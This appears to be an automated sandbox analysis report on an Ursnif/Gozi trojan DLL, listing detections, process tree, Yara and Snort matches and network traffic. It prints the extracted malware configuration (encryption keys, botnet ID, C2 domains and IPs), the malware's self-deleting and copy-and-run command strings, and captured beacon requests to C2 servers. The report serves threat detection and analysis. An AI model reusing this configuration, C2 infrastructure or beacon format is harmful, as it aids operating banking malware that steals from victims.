Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Zeip.dll

Overview

General Information

Sample Name:Zeip.dll
Analysis ID:790195
MD5:85fa54c2a97ad3a1f8bd64af62450511
SHA1:db92c0a81e8b27d222607e093ccc9d00485db119
SHA256:e609894b274a6c42e971e8082af8fd167ade4aef5d1a3816d5acea04839f0b35
Tags:dll
Infos:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Found API chain indicative of debugger detection
Machine Learning detection for sample
Found evasive API chain (may stop execution after checking system information)
Writes registry values via WMI
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 5308 cmdline: loaddll32.exe "C:\Users\user\Desktop\Zeip.dll" MD5: 1F562FBF37040EC6C43C8D5EF619EA39)
    • conhost.exe (PID: 4904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 244 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Zeip.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5412 cmdline: rundll32.exe "C:\Users\user\Desktop\Zeip.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • WerFault.exe (PID: 4124 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5308 -s 408 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 4808 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5308 -s 416 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 1700 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5308 -s 444 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "nEv1xgiiSSEq+UsF/sH972dYWlbdaVOznM6pMFVoUS05gtglJzWNlT7nMktPHUwL6//kjiNOqc4tDzQZ19ymuBpLEGqUVvC4ejuRj/0ho+UjebbguqPlH5n0kxpUzAwMML4tOLtp9LPhNicxLWntxqAhB5vWoa98iW2MUoUphRHcd2dO72hrBAGA6DCyFxDcS8WlyxVQ7VBx1Nh+pbslLneoja8gI1kgMhn78GgHQk/qR1oUbrcP/HgzqcZ46oTj/Z8oDh7Uf+bI3Bv799doULwM1Koc6uZt/pcclNdWQSZWvlVfFozPuVvT9NaBray36Sn10KTAPhwPYdk+nFxrudJjVCtbXTj4F13byKvdsT0=", "c2_domain": ["trackingg-protectioon.cdn4.mozilla.net", "80.77.23.77", "trackingg-protectioon.cdn4.mozilla.net", "80.77.25.109", "protectioon.cdn4.mozilla.net", "170.130.165.182", "protectioon.cdn4.mozilla.net", "80.77.25.114"], "botnet": "20005", "server": "50", "serpent_key": "OFX3RdYc8A5rFAaL", "sleep_time": "3", "CONF_TIMEOUT": "5", "SetWaitableTimer_value": "0"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000003.418603485.0000000005108000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000003.00000003.418603485.0000000005108000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_fd494041unknownunknown
    • 0xff0:$a1: /C ping localhost -n %u && del "%s"
    • 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
    • 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
    • 0xca8:$a5: filename="%.4u.%lu"
    • 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xe72:$a9: &whoami=%s
    • 0xe5a:$a10: %u.%u_%u_%u_x%u
    • 0xc22:$a11: size=%u&hash=0x%08x
    • 0xc13:$a12: &uptime=%u
    • 0xda7:$a13: %systemroot%\system32\c_1252.nls
    • 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
    00000003.00000003.418603485.0000000005108000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_261f5ac5unknownunknown
    • 0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
    • 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu"
    • 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)
    • 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\
    • 0x1868:$a9: Software\AppDataLow\Software\Microsoft\
    00000003.00000003.418848530.0000000005108000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000003.00000003.418848530.0000000005108000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_fd494041unknownunknown
      • 0xff0:$a1: /C ping localhost -n %u && del "%s"
      • 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
      • 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
      • 0xca8:$a5: filename="%.4u.%lu"
      • 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
      • 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X
      • 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X
      • 0xe72:$a9: &whoami=%s
      • 0xe5a:$a10: %u.%u_%u_%u_x%u
      • 0xc22:$a11: size=%u&hash=0x%08x
      • 0xc13:$a12: &uptime=%u
      • 0xda7:$a13: %systemroot%\system32\c_1252.nls
      • 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
      Click to see the 25 entries

      Sigma Signatures

      No Sigma rule has matched

      Snort Signatures

      Timestamp:192.168.2.680.77.23.7749728802033204 01/23/23-23:00:21.133917
      SID:2033204
      Source Port:49728
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.680.77.23.7749728802033203 01/23/23-23:00:21.133917
      SID:2033203
      Source Port:49728
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.680.77.25.10949733802033203 01/23/23-23:01:31.648906
      SID:2033203
      Source Port:49733
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.680.77.25.10949733802033204 01/23/23-23:01:31.648906
      SID:2033204
      Source Port:49733
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.6170.130.165.18249735802033203 01/23/23-23:02:42.232320
      SID:2033203
      Source Port:49735
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.6170.130.165.18249735802033204 01/23/23-23:02:42.232320
      SID:2033204
      Source Port:49735
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for submitted file
      Source: Zeip.dllVirustotal: Detection: 31%Perma Link
      Antivirus detection for URL or domain
      Source: http://80.77.23.77/fonts/1c4TnFuCv/CcRXrQPe30HaMexmLpgF/4aupYBGHp_2BOME_2FG/0huvHbhao4TfaTiw3rk5b1/qAvira URL Cloud: Label: malware
      Source: http://80.77.23.77/fonts/1c4TnFuCv/CcRXrQPe30HaMexmLpgF/4aupYBGHp_2BOME_2FG/0huvHbhao4TfaTiw3rk5b1/q2ZxS3FX1_2FQ/CzfxjEWy/KpMrpyirWaYAf_2F58pSM7E/hql2_2Ff0P/Z_2FzTZSSRCDR8bjj/lvIYML_2BVAb/NDNuDcBuj0i/x8S9VCMsW3ok_2/BnlqZTWQkXRsJMXJ2eLuL/xrE8_2BMiM9wsQ1R/fYIgNLn5R2u2Ad3/7X_2FsIOWaCy11iw8h/jUscFfxSY/bywnHnDEPGzuSt6TUFwm/lh8gKMKhoVQ1xsZNS7s/DZZFZuGiVc6hKPbFFxnPb_/2Bv.bakAvira URL Cloud: Label: malware
      Machine Learning detection for sample
      Source: Zeip.dllJoe Sandbox ML: detected
      Source: 3.2.rundll32.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen2
      Source: 00000003.00000002.773301251.0000000004A79000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "nEv1xgiiSSEq+UsF/sH972dYWlbdaVOznM6pMFVoUS05gtglJzWNlT7nMktPHUwL6//kjiNOqc4tDzQZ19ymuBpLEGqUVvC4ejuRj/0ho+UjebbguqPlH5n0kxpUzAwMML4tOLtp9LPhNicxLWntxqAhB5vWoa98iW2MUoUphRHcd2dO72hrBAGA6DCyFxDcS8WlyxVQ7VBx1Nh+pbslLneoja8gI1kgMhn78GgHQk/qR1oUbrcP/HgzqcZ46oTj/Z8oDh7Uf+bI3Bv799doULwM1Koc6uZt/pcclNdWQSZWvlVfFozPuVvT9NaBray36Sn10KTAPhwPYdk+nFxrudJjVCtbXTj4F13byKvdsT0=", "c2_domain": ["trackingg-protectioon.cdn4.mozilla.net", "80.77.23.77", "trackingg-protectioon.cdn4.mozilla.net", "80.77.25.109", "protectioon.cdn4.mozilla.net", "170.130.165.182", "protectioon.cdn4.mozilla.net", "80.77.25.114"], "botnet": "20005", "server": "50", "serpent_key": "OFX3RdYc8A5rFAaL", "sleep_time": "3", "CONF_TIMEOUT": "5", "SetWaitableTimer_value": "0"}
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04B96EB4 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,3_2_04B96EB4
      Source: Zeip.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
      Source: Binary string: ZR@4Hk*7L7H|SDs!u.pdb source: loaddll32.exe, 00000000.00000002.272862074.0000000000489000.00000002.00000001.01000000.00000003.sdmp, Zeip.dll
      Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then push ebp0_2_00401511
      Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then push ebp0_2_00401511
      Source: C:\Windows\System32\loaddll32.exeCode function: 4x nop then push ebp0_2_00401510

      Networking

      barindex
      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 170.130.165.182 80Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: trackingg-protectioon.cdn4.mozilla.net
      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 80.77.23.77 80Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 80.77.25.109 80Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: protectioon.cdn4.mozilla.net
      Snort IDS alert for network traffic
      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49728 -> 80.77.23.77:80
      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49728 -> 80.77.23.77:80
      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49733 -> 80.77.25.109:80
      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49733 -> 80.77.25.109:80
      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49735 -> 170.130.165.182:80
      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49735 -> 170.130.165.182:80
      Source: Joe Sandbox ViewASN Name: MEER-ASmeerfarbigGmbHCoKGDE MEER-ASmeerfarbigGmbHCoKGDE
      Source: Joe Sandbox ViewASN Name: MEER-ASmeerfarbigGmbHCoKGDE MEER-ASmeerfarbigGmbHCoKGDE
      Source: global trafficHTTP traffic detected: GET /fonts/1c4TnFuCv/CcRXrQPe30HaMexmLpgF/4aupYBGHp_2BOME_2FG/0huvHbhao4TfaTiw3rk5b1/q2ZxS3FX1_2FQ/CzfxjEWy/KpMrpyirWaYAf_2F58pSM7E/hql2_2Ff0P/Z_2FzTZSSRCDR8bjj/lvIYML_2BVAb/NDNuDcBuj0i/x8S9VCMsW3ok_2/BnlqZTWQkXRsJMXJ2eLuL/xrE8_2BMiM9wsQ1R/fYIgNLn5R2u2Ad3/7X_2FsIOWaCy11iw8h/jUscFfxSY/bywnHnDEPGzuSt6TUFwm/lh8gKMKhoVQ1xsZNS7s/DZZFZuGiVc6hKPbFFxnPb_/2Bv.bak HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 80.77.23.77Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /fonts/WezqXaXzLUf7H3RvrWbfe/K3Y9YSHOHCe0ThXT/oS_2BzX_2FYO7OS/mLbIpFep6ip0wCkR_2/Fabd4fjNq/DSsjhIayoRb3vEB0gYF1/DvOBMdqirpHwq9OOdKp/l0IRYH1_2FrZtdyrRlJpVe/H42NRq5RQ81GK/VCcbxNs_/2FZJHoRNxFlaAYrUN5O5LcL/v418d_2By_/2BRt8_2Bs3hdtDQLK/oecVg251dFjL/TwR5ovb3LSr/UbFTKRYVAf_2BS/5oocK_2FZTCnj_2Bk7f5k/WVm6_2F1PqjI22z0/31vjGE0KZ/X3zQUGvA.bak HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 80.77.25.109Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /fonts/q9O3GZmMqz/vH_2FuinHCfqB7maU/gyy32Rx1oAyU/1_2B_2FdYvR/zffWIXZHaC8HuA/faDX7AnA7p_2FL2kFpu49/EdapT6mXzLN5rW1a/SHFg4AdpPfCaQnC/CaQclcnPKuVX6yIIBl/W7EdbR3h4/Baog4bkRBbEa_2Bk3PMN/6evVCCp2n5IHM6zv9Ax/6y6Xf8N9YXabol05shGVYH/wNzbR_2FsIJoL/mKWJ5fSu/iIED2oXHSZaY9qZ9s7kS1uo/kYtbGsIEzt/S4yUXjfCecHcWUBLD/uwFDVmrla6y/oLDy.bak HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 170.130.165.182Connection: Keep-AliveCache-Control: no-cache
      Source: unknownDNS traffic detected: query: trackingg-protectioon.cdn4.mozilla.net replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: protectioon.cdn4.mozilla.net replaycode: Name error (3)
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 23 Jan 2023 22:00:21 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 23 Jan 2023 22:01:31 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 23 Jan 2023 22:02:42 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
      Source: unknownTCP traffic detected without corresponding DNS query: 80.77.23.77
      Source: unknownTCP traffic detected without corresponding DNS query: 80.77.23.77
      Source: unknownTCP traffic detected without corresponding DNS query: 80.77.23.77
      Source: unknownTCP traffic detected without corresponding DNS query: 80.77.23.77
      Source: unknownTCP traffic detected without corresponding DNS query: 80.77.23.77
      Source: unknownTCP traffic detected without corresponding DNS query: 80.77.25.109
      Source: unknownTCP traffic detected without corresponding DNS query: 80.77.25.109
      Source: unknownTCP traffic detected without corresponding DNS query: 80.77.25.109
      Source: unknownTCP traffic detected without corresponding DNS query: 80.77.25.109
      Source: unknownTCP traffic detected without corresponding DNS query: 80.77.25.109
      Source: unknownTCP traffic detected without corresponding DNS query: 170.130.165.182
      Source: unknownTCP traffic detected without corresponding DNS query: 170.130.165.182
      Source: unknownTCP traffic detected without corresponding DNS query: 170.130.165.182
      Source: unknownTCP traffic detected without corresponding DNS query: 170.130.165.182
      Source: unknownTCP traffic detected without corresponding DNS query: 80.77.25.109
      Source: unknownTCP traffic detected without corresponding DNS query: 80.77.23.77
      Source: unknownTCP traffic detected without corresponding DNS query: 80.77.23.77
      Source: unknownTCP traffic detected without corresponding DNS query: 80.77.23.77
      Source: unknownTCP traffic detected without corresponding DNS query: 80.77.23.77
      Source: unknownTCP traffic detected without corresponding DNS query: 80.77.23.77
      Source: unknownTCP traffic detected without corresponding DNS query: 80.77.23.77
      Source: rundll32.exe, 00000003.00000002.772970164.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.772970164.0000000000B14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://170.130.165.182/
      Source: rundll32.exe, 00000003.00000002.772970164.0000000000B14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://170.130.165.182/fonts/q9O3GZmMqz/vH_2FuinHCfqB7maU/gyy32Rx1oAyU/1_2B_2FdYvR/zffWIXZHaC8HuA/fa
      Source: rundll32.exe, 00000003.00000002.772970164.0000000000B14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.77.23.77/fonts/1c4TnFuCv/CcRXrQPe30HaMexmLpgF/4aupYBGHp_2BOME_2FG/0huvHbhao4TfaTiw3rk5b1/q
      Source: rundll32.exe, 00000003.00000002.772970164.0000000000B14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.77.25.109/fonts/WezqXaXzLUf7H3RvrWbfe/K3Y9YSHOHCe0ThXT/oS_2BzX_2FYO7OS/mLbIpFep6ip0wCkR_2/
      Source: rundll32.exe, 00000003.00000002.772970164.0000000000B32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://protectioon.cdn4.mozilla.net/fonts/zo_2F9LTFy1/2yei3vv_2FO_2B/_2FhNinG_2BU_2Bmlgeam/LapYRzVWz
      Source: rundll32.exe, 00000003.00000002.772970164.0000000000B14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://trackingg-protectioon.cdn4.mozilla.net/fonts/MCO7afnwu37/Dbba1QyGgF8xPz/p8nSqYopKMHf_2B9Qpctn
      Source: unknownDNS traffic detected: queries for: trackingg-protectioon.cdn4.mozilla.net
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04B95E3A ResetEvent,ResetEvent,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError,3_2_04B95E3A
